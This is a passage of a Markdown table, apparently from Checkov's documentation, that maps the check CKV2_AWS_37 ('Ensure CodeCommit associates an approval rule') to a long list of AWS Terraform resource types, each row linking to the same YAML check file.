-| 1304 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1305 | CKV2_AWS_37 | resource | 
aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1306 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1307 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1308 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1309 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1310 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1311 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1312 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1313 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1314 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1315 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1316 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1317 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1318 | CKV2_AWS_37 | resource | 
aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1319 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1320 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1321 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1322 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1323 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1324 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1325 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1326 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1327 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1328 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1329 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1330 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1331 | CKV2_AWS_37 | resource | aws_s3_bucket_object | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1332 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1333 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1334 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1335 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1336 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1337 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1338 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1339 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1340 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1341 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1342 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1343 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1344 | CKV2_AWS_37 | 
resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1345 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1346 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1347 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1348 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1349 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1350 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1351 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1352 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1353 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1354 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1355 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1356 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1357 | CKV2_AWS_37 | resource | 
aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1358 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1359 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1360 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1361 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1362 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1363 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1364 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1365 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1366 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1367 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1368 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1369 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1370 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1371 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1372 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1373 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1374 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1375 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1376 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1377 | CKV2_AWS_37 | resource | 
aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1378 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1379 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1380 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1381 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1382 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1383 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| -| 1384 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1385 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1386 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1387 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1388 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1389 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1390 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1391 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1392 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1393 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1394 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1395 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1396 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1397 | CKV2_AWS_37 | resource | 
aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1398 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1399 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1400 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1401 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1402 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1403 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1404 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1405 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1406 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1407 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1408 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | 